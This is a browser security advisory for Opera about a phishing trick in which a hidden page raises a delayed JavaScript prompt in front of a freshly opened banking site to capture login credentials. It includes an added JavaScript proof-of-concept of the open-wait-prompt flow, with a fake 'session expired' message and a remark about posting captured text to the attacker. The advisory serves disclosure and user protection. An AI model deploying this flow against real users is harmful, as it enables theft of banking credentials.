Advisory: Phishing attack possible with a delayed JavaScript prompt
Severity: Moderate/low
Problem description
A malicious page can be crafted to send the user to his banking site in a new window and, shortly afterwards, display a JavaScript dialog (such as a prompt) enticing the user to type in his bank login credentials.
The dialog appears in front of the banking page, while the window it really belongs to (the malicious page) stays hidden behind it. If the timing and context are right, the message displayed in the dialog may deceive the user, and anything he types goes to the malicious page's script, not to the bank.
For example, the user goes to his banking site from a Web page that happens to have a link to that bank. If he got the link to that page through e-mail, it could easily have come from a scammer.
Vulnerable versions of Opera
Any version that supports JavaScript. Tested on 6.1, 7.0 and 7.54.
Opera's response
Opera Software has made a fix that prevents this trick. The fix is available in the 8.0 version of Opera, which is due later this year. A beta version of Opera 8.0 with the fix is available for download.
We will not make a bugfix release for this.
There are other avenues of attack that can produce better imitations and deceptions than this particular approach. Educating users is the best we can do.
Safety precaution
We advise users to always access their online banks and vendors by way of bookmarks they have made themselves, or by typing the address into the address field. Never follow a link to a trusted site from a site that you do not fully trust. This rule applies to any site where you would enter sensitive information, such as your credit card number.
Extra precaution
If you only have one page ("tab") open in Opera, this attack will not work: the dialog has to come from a second, hidden page that is still running script, and with a single page open there is nowhere for it to come from. This precaution also guards against several other JavaScript tricks that depend on a hidden window.
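To make both the attack described under "Problem description" and the reason this precaution defeats it concrete, here is an added example. It is not Opera's or Secunia's code; it reconstructs the flow the advisory describes (open the bank in a new window, wait, then raise prompt() from the original window). The window object is passed in as a parameter so that the same function runs against the real `window` in a browser and against the constructed fake below when run offline under Node. The function names, the URL and the prompt text are all assumptions made for the example.

```javascript
// Added example, not code from Opera or Secunia. `win` is whatever object
// supplies open/setTimeout/prompt: the real `window` in a browser, or the
// constructed fake further down for an offline run.

// Run the attack from the page that `win` belongs to: open the target site
// in a new window, then after delayMs raise prompt() from this window.
// Returns a log of what happened; onCaptured receives what the user typed.
function delayedPromptAttack(win, opts, onCaptured) {
  const log = [];

  // Step 1: send the victim to the genuine site in a NEW window. The
  // attacking page has to stay alive in the background: if it navigated
  // itself to the bank (win.location = url) its script, and with it the
  // timer below, would be gone. This is why a single open page is safe.
  const bankWindow = win.open(opts.targetUrl, "_blank");
  log.push({ step: "open", url: opts.targetUrl, ok: bankWindow !== null });

  // Step 2: wait until the bank page has loaded and looks genuine, then
  // show a modal prompt. It belongs to the hidden attacking window, but on
  // the vulnerable Opera versions it was drawn in front of the bank window.
  win.setTimeout(() => {
    const typed = win.prompt(opts.message, "");
    log.push({ step: "prompt", message: opts.message, captured: typed });
    if (typed !== null) onCaptured(typed); // null means the user cancelled
  }, opts.delayMs);

  return log;
}

// Constructed stand-in for `window` so the flow runs without a browser.
// Timers fire immediately and prompt() answers with a canned string that
// stands for what a deceived user might type (null = Cancel pressed).
function makeFakeWindow(userReply) {
  const calls = [];
  return {
    calls,
    open(url, target) { calls.push(["open", url, target]); return {}; },
    setTimeout(fn, ms) { calls.push(["setTimeout", ms]); fn(); return 1; },
    prompt(msg, def) { calls.push(["prompt", msg, def]); return userReply; },
  };
}

// Offline demonstration with the fake window and a constructed URL.
function demo() {
  const captured = [];
  const win = makeFakeWindow("user-123 / hunter2"); // constructed reply
  const log = delayedPromptAttack(win, {
    targetUrl: "https://bank.example/login", // constructed, not a real site
    delayMs: 5000,
    message: "Your session has expired. Re-enter your user ID and password:",
  }, (s) => captured.push(s));
  return { captured, log, calls: win.calls };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

In a browser the call would be `delayedPromptAttack(window, {...}, send)` from the attacking page, with `send` posting the captured text wherever the attacker collects it; the fake keeps the rest of the flow identical so the ordering (open, delay, prompt) can be checked without a browser.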
Credits
Thanks to Jakob Balle at Secunia for demonstrating how delayed popups can be used for deception.